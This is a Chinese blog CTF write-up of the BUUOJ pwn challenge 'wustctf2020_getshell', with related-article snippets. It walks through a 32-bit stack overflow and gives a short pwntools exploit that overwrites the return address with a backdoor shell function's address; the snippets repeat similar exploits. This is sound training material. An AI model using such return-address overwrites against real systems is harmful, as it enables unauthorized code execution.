wustctf2020_getshell

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量785 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121588176
版权

wustctf2020_getshell

使用checksec查看:
在这里插入图片描述
只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。

拉进IDA中查看:
在这里插入图片描述
主函数中直接给漏洞函数,跟进:
在这里插入图片描述
read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget

首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell()
在这里插入图片描述
ok了,这题直接秒了。

exp:

from pwn import *

#start 
# r = process("../buu/wustctf2020_getshell")
r = remote("node4.buuoj.cn",25248)

#params
shell_addr = 0x804851B

#attack
payload = b'M'*(0x18+4) + p32(shell_addr)
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 673
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
weixin_45461609的博客
03-30 3602
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3 Web check in 修改maxlength,删除按钮的d...
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 175
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 661
[buuctf]wustctf2020_getshell
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 173
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
[BUUCTF]刷题记录6
Huamang的博客
04-04 456
[WUSTCTF2020]朴实无华 目录扫描 intval函数的科学记数法绕过 MD5加密后与加密前相等 直接去扫目录,扫到了fl4g.php if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt
BUUOJ PWN 61-80
2h4ox1n9
12-17 260
61\
wustctf2020_getshell_2
m0sway的博客
12-13 2192
wustctf2020_getshell_2 使用checksec查看: 只开启了栈不可执行,应该和1一样是道栈溢出题目。 放进IDA中查看: 和1一样主函数中给出漏洞函数,漏洞函数中直接一个栈溢出。 但是后门函数并没有直接给出system(/bin/sh),而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh") 这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh,但是这串字符串的最后sh可以用作参数,同样可以获取到shell。 记录下地
BUUCTF-wustctf2020_getshell1
Rt1Text的博客
12-04 201
这题没有什么过多解释的,就是一道简单的ret2text,有shell的地址应该是太简单了做的人少就放在了BUUCTF的第二页,按照顺序做的,也就写上了
[BUUCTF]PWN——wustctf2020_getshell
BangSen1的博客
03-30 286
wustctf2020_getshell 例行检查 ,开启NX保护,32位, 运行一下,打印出一个图形。 用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl
[BUUCTF-pwn]——wustctf2020_getshell
Y_peak的博客
03-16 187
[BUUCTF-pwn]——wustctf2020_getshell 额,太简单了直接上exploit吧 直接利用栈溢出,修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1223
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 522
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 427
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
hadoop_getshell
09-05
hadoop_getshell指的是利用Hadoop漏洞获取系统shell权限。Hadoop是一个开放源代码的分布式存储和计算框架,被广泛应用于大数据处理。但是,由于Hadoop的复杂性和开放性,可能存在各种漏洞和安全风险。 Hadoop_getshell通常是通过利用Hadoop的可远程读写文件的特性进行的攻击。攻击者利用该特性上传恶意的Jar文件,这个Jar文件包含了指令,能够执行系统命令,从而获取到服务器的shell权限。 一旦攻击者成功获取到shell权限,他们就可以在系统中执行各种操作,包括但不限于查看、修改、删除敏感数据,制造破坏或者窃取敏感信息。 防范hadoop_getshell攻击的关键是加强Hadoop集群的安全性。以下是一些常见的防御措施: 1. 及时更新Hadoop的版本和补丁,以修复已知的安全漏洞。 2. 限制Hadoop集群的访问权限。只有授权用户才能访问和操作集群。 3. 配置防火墙,限制对Hadoop集群的外部访问。 4. 定期审查Hadoop集群的日志,寻找异常行为和潜在的安全威胁。 5. 定期进行安全扫描和漏洞扫描,发现潜在的安全漏洞并及时修复。 6. 加强系统的监控和入侵检测,及时发现并应对异常活动。 7. 对Hadoop集群进行访问控制,使用强密码、多因素认证等加固账户安全。 8. 监控网络流量,发现并阻止异常的数据传输行为。 9. 定期进行安全培训和意识提升,提高员工对安全风险和攻击手段的认知。 总之,要防范hadoop_getshell攻击,需要综合应用多种防御措施,不断加强Hadoop集群的安全性,保护好大数据环境中的敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值